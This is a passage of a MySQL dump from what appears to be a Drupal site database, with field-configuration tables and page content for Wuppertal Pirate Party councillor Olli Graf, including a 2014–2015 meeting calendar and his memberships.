`dpl_field_config` ( `id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for a field', `field_name` varchar(32) NOT NULL COMMENT 'The name of this field. Non-deleted field names are unique, but multiple deleted fields can have the same name.', `type` varchar(128) NOT NULL COMMENT 'The type of this field.', `module` varchar(128) NOT NULL DEFAULT '' COMMENT 'The module that implements the field type.', `active` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the module that implements the field type is enabled.', `storage_type` varchar(128) NOT NULL COMMENT 'The storage backend for the field.', `storage_module` varchar(128) NOT NULL DEFAULT '' COMMENT 'The module that implements the storage backend.', `storage_active` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the module that implements the storage backend is enabled.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT '@TODO', `data` longblob NOT NULL COMMENT 'Serialized data containing the field properties that do not warrant a dedicated column.', `cardinality` tinyint(4) NOT NULL DEFAULT '0', `translatable` tinyint(4) NOT NULL DEFAULT '0', `deleted` tinyint(4) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `field_name` (`field_name`), KEY `active` (`active`), KEY `storage_active` (`storage_active`), KEY `deleted` (`deleted`), KEY `module` (`module`), KEY `storage_module` (`storage_module`), KEY `type` (`type`), KEY `storage_type` (`storage_type`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_config` -- LOCK TABLES `dpl_field_config` WRITE; /*!40000 ALTER TABLE `dpl_field_config` DISABLE KEYS */; INSERT INTO `dpl_field_config` VALUES (1,'comment_body','text_long','text',1,'field_sql_storage','field_sql_storage',1,0,'a:6:{s:12:\"entity_types\";a:1:{i:0;s:7:\"comment\";}s:12:\"translatable\";b:0;s:8:\"settings\";a:0:{}s:7:\"storage\";a:4:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";i:1;}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}}',1,0,0),(2,'body','text_with_summary','text',1,'field_sql_storage','field_sql_storage',1,0,'a:6:{s:12:\"entity_types\";a:1:{i:0;s:4:\"node\";}s:12:\"translatable\";b:0;s:8:\"settings\";a:0:{}s:7:\"storage\";a:4:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";i:1;}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}}',1,0,0),(3,'field_tags','taxonomy_term_reference','taxonomy',1,'field_sql_storage','field_sql_storage',1,0,'a:6:{s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:4:\"tags\";s:6:\"parent\";i:0;}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";b:0;s:7:\"storage\";a:4:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";i:1;}s:12:\"foreign keys\";a:1:{s:3:\"tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:7:\"indexes\";a:1:{s:3:\"tid\";a:1:{i:0;s:3:\"tid\";}}}',-1,0,0),(4,'field_image','image','image',1,'field_sql_storage','field_sql_storage',1,0,'a:6:{s:7:\"indexes\";a:1:{s:3:\"fid\";a:1:{i:0;s:3:\"fid\";}}s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";b:0;}s:7:\"storage\";a:4:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";i:1;}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";b:0;s:12:\"foreign keys\";a:1:{s:3:\"fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:3:\"fid\";s:3:\"fid\";}}}}',1,0,0); /*!40000 ALTER TABLE `dpl_field_config` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_config_instance` -- DROP TABLE IF EXISTS `dpl_field_config_instance`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_config_instance` ( `id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for a field instance', `field_id` int(11) NOT NULL COMMENT 'The identifier of the field attached by this instance', `field_name` varchar(32) NOT NULL DEFAULT '', `entity_type` varchar(32) NOT NULL DEFAULT '', `bundle` varchar(128) NOT NULL DEFAULT '', `data` longblob NOT NULL, `deleted` tinyint(4) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `field_name_bundle` (`field_name`,`entity_type`,`bundle`), KEY `deleted` (`deleted`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_config_instance` -- LOCK TABLES `dpl_field_config_instance` WRITE; /*!40000 ALTER TABLE `dpl_field_config_instance` DISABLE KEYS */; INSERT INTO `dpl_field_config_instance` VALUES (1,1,'comment_body','comment','comment_node_page','a:6:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";}',0),(2,2,'body','node','page','a:6:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";}',0),(3,1,'comment_body','comment','comment_node_article','a:6:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";}',0),(4,2,'body','node','article','a:6:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";}',0),(5,3,'field_tags','node','article','a:6:{s:5:\"label\";s:4:\"Tags\";s:11:\"description\";s:63:\"Enter a comma-separated list of words to describe your content.\";s:6:\"widget\";a:4:{s:4:\"type\";s:21:\"taxonomy_autocomplete\";s:6:\"weight\";i:-4;s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:6:\"module\";s:8:\"taxonomy\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:6:\"teaser\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}}s:8:\"settings\";a:1:{s:18:\"user_register_form\";b:0;}s:8:\"required\";b:0;}',0),(6,4,'field_image','node','article','a:6:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:40:\"Upload an image to go with this article.\";s:8:\"required\";b:0;s:8:\"settings\";a:9:{s:14:\"file_directory\";s:11:\"field/image\";s:15:\"file_extensions\";s:16:\"png gif jpg jpeg\";s:12:\"max_filesize\";s:0:\"\";s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:9:\"alt_field\";b:1;s:11:\"title_field\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:6:\"widget\";a:4:{s:4:\"type\";s:11:\"image_image\";s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:5:\"large\";s:10:\"image_link\";s:0:\"\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:6:\"medium\";s:10:\"image_link\";s:7:\"content\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}}}',0); /*!40000 ALTER TABLE `dpl_field_config_instance` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_data_body` -- DROP TABLE IF EXISTS `dpl_field_data_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_data_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `body_value` longtext, `body_summary` longtext, `body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `body_format` (`body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 2 (body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_data_body` -- LOCK TABLES `dpl_field_data_body` WRITE; /*!40000 ALTER TABLE `dpl_field_data_body` DISABLE KEYS */; INSERT INTO `dpl_field_data_body` VALUES ('node','page',0,2,2,'und',0,'Olli Graf\r\nStadtverordneter im Rat der Stadt Wuppertal\r\nMitglied der Piratenpartei.\r\nMitglied in der Fraktion Bündnis 90/Die Grünen.\r\n\r\n','Homepage des Stadtverordneten Olli Graf im Rat der Stadt Wuppertal für die Piratenpartei.','filtered_html'),('node','article',0,5,5,'und',0,'21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal\r\n23.11.2014 Kreismitgliederversammlung\r\n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes\r\n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern\r\n03.12.2014 BV Elberfeld\r\n09.12.2014 BV Barmen\r\n15.12.2014 Ratssitzung\r\n19.12.2014 offiz. Eröffnung der Nordbahntrasse\r\n\r\nJanuar\r\n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld\r\n28.01. 2015 BV Elberfeld\r\n\r\nFebruar\r\n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung\r\n10.02.2015 Ratssondersitzung\r\n11.02.2015 Wuppertal 3.0\r\n24.02.2015 BV Barmen\r\n25.02.2015 BV Elberfeld\r\n\r\nMärz\r\n03.03.2015 Wuppertal 3.0\r\n09.03.2015 Ratssitzung\r\n24.03.2015 Nahverkehr neu denken: Das solidarische Bürgerticket\r\n25.03.2015 Wuppertal 3.0\r\n\r\nApril\r\n14.04.2015 Wuppertal 3.0\r\n22.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n28.04.2014 BV Barmen\r\n29.04.2015 BV Elberfeld\r\n\r\nMai\r\n06.05.2015 Wuppertal 3.0\r\n11.05.2015 Ratssitzung\r\n21.05.2015 Wuppertal 3.0\r\n30.05.2015 Wuppertal 3.0\r\n\r\nJuni\r\n03.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n09.06.2015 BV Barmen\r\n10.06.2015 BV Elberfeld\r\n22.06.2015 Ratssitzung\r\n29.06.2015 Beginn der Sommerferien\r\n\r\nJuli\r\n25./26.07.2015 BPT 2015.1 Würzburg\r\n\r\nAugust\r\n25.08.2015 BV Barmen\r\n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nSeptember\r\n07.09.2015 Ratssitzung\r\n\r\nJeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61\r\n','','filtered_html'),('node','article',0,6,6,'und',0,'Ich bin Mitglied in folgenden Organisationen:\r\n\r\n
                                  \r\n
                                • ASV -Allgemeiner Sportverein Wuppertal e.V.
                                • \r\n
                                • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                                • \r\n
                                • Musikpiraten e.V.
                                • \r\n
                                • NAG - Neue Assekuranz Gerwerkschaft
                                • \r\n
                                • Piratenpartei NRW
                                • \r\n
                                • piKo NRW e.V.
                                • \r\n
                                ','','filtered_html'); /*!40000 ALTER TABLE `dpl_field_data_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_data_comment_body` -- DROP TABLE IF EXISTS `dpl_field_data_comment_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_data_comment_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `comment_body_value` longtext, `comment_body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `comment_body_format` (`comment_body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 1 (comment_body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_data_comment_body` -- LOCK TABLES `dpl_field_data_comment_body` WRITE; /*!40000 ALTER TABLE `dpl_field_data_comment_body` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_field_data_comment_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_data_field_image` -- DROP TABLE IF EXISTS `dpl_field_data_field_image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_data_field_image` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_image_fid` int(10) unsigned DEFAULT NULL COMMENT 'The dpl_file_managed.fid being referenced in this field.', `field_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image’s ’alt’ attribute.', `field_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image’s ’title’ attribute.', `field_image_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.', `field_image_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.', PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_image_fid` (`field_image_fid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 4 (field_image)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_data_field_image` -- LOCK TABLES `dpl_field_data_field_image` WRITE; /*!40000 ALTER TABLE `dpl_field_data_field_image` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_field_data_field_image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_data_field_tags` -- DROP TABLE IF EXISTS `dpl_field_data_field_tags`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_data_field_tags` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_tags_tid` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_tags_tid` (`field_tags_tid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 3 (field_tags)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_data_field_tags` -- LOCK TABLES `dpl_field_data_field_tags` WRITE; /*!40000 ALTER TABLE `dpl_field_data_field_tags` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_field_data_field_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_revision_body` -- DROP TABLE IF EXISTS `dpl_field_revision_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_revision_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `body_value` longtext, `body_summary` longtext, `body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `body_format` (`body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 2 (body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_revision_body` -- LOCK TABLES `dpl_field_revision_body` WRITE; /*!40000 ALTER TABLE `dpl_field_revision_body` DISABLE KEYS */; INSERT INTO `dpl_field_revision_body` VALUES ('node','page',0,2,2,'und',0,'Olli Graf\r\nStadtverordneter im Rat der Stadt Wuppertal\r\nMitglied der Piratenpartei.\r\nMitglied in der Fraktion Bündnis 90/Die Grünen.\r\n\r\n','Homepage des Stadtverordneten Olli Graf im Rat der Stadt Wuppertal für die Piratenpartei.','filtered_html'),('node','article',0,5,5,'und',0,'21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal\r\n23.11.2014 Kreismitgliederversammlung\r\n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes\r\n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern\r\n03.12.2014 BV Elberfeld\r\n09.12.2014 BV Barmen\r\n15.12.2014 Ratssitzung\r\n19.12.2014 offiz. Eröffnung der Nordbahntrasse\r\n\r\nJanuar\r\n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld\r\n28.01. 2015 BV Elberfeld\r\n\r\nFebruar\r\n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung\r\n10.02.2015 Ratssondersitzung\r\n11.02.2015 Wuppertal 3.0\r\n24.02.2015 BV Barmen\r\n25.02.2015 BV Elberfeld\r\n\r\nMärz\r\n03.03.2015 Wuppertal 3.0\r\n09.03.2015 Ratssitzung\r\n24.03.2015 Nahverkehr neu denken: Das solidarische Bürgerticket\r\n25.03.2015 Wuppertal 3.0\r\n\r\nApril\r\n14.04.2015 Wuppertal 3.0\r\n22.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n28.04.2014 BV Barmen\r\n29.04.2015 BV Elberfeld\r\n\r\nMai\r\n06.05.2015 Wuppertal 3.0\r\n11.05.2015 Ratssitzung\r\n21.05.2015 Wuppertal 3.0\r\n30.05.2015 Wuppertal 3.0\r\n\r\nJuni\r\n03.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n09.06.2015 BV Barmen\r\n10.06.2015 BV Elberfeld\r\n22.06.2015 Ratssitzung\r\n29.06.2015 Beginn der Sommerferien\r\n\r\nJuli\r\n25./26.07.2015 BPT 2015.1 Würzburg\r\n\r\nAugust\r\n25.08.2015 BV Barmen\r\n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nSeptember\r\n07.09.2015 Ratssitzung\r\n\r\nJeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61\r\n','','filtered_html'),('node','article',0,6,6,'und',0,'Ich bin Mitglied in folgenden Organisationen:\r\n\r\n
                                  \r\n
                                • ASV -Allgemeiner Sportverein Wuppertal e.V.
                                • \r\n
                                • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                                • \r\n
                                • Musikpiraten e.V.
                                • \r\n
                                • NAG - Neue Assekuranz Gerwerkschaft
                                • \r\n
                                • Piratenpartei NRW
                                • \r\n
                                • piKo NRW e.V.
                                • \r\n
                                ','','filtered_html'); /*!40000 ALTER TABLE `dpl_field_revision_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_revision_comment_body` -- DROP TABLE IF EXISTS `dpl_field_revision_comment_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_revision_comment_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `comment_body_value` longtext, `comment_body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `comment_body_format` (`comment_body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 1 (comment_body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_revision_comment_body` -- LOCK TABLES `dpl_field_revision_comment_body` WRITE; /*!40000 ALTER TABLE `dpl_field_revision_comment_body` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_field_revision_comment_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_revision_field_image` -- DROP TABLE IF EXISTS `dpl_field_revision_field_image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_revision_field_image` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_image_fid` int(10) unsigned DEFAULT NULL COMMENT 'The dpl_file_managed.fid being referenced in this field.', `field_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image’s ’alt’ attribute.', `field_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image’s ’title’ attribute.', `field_image_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.', 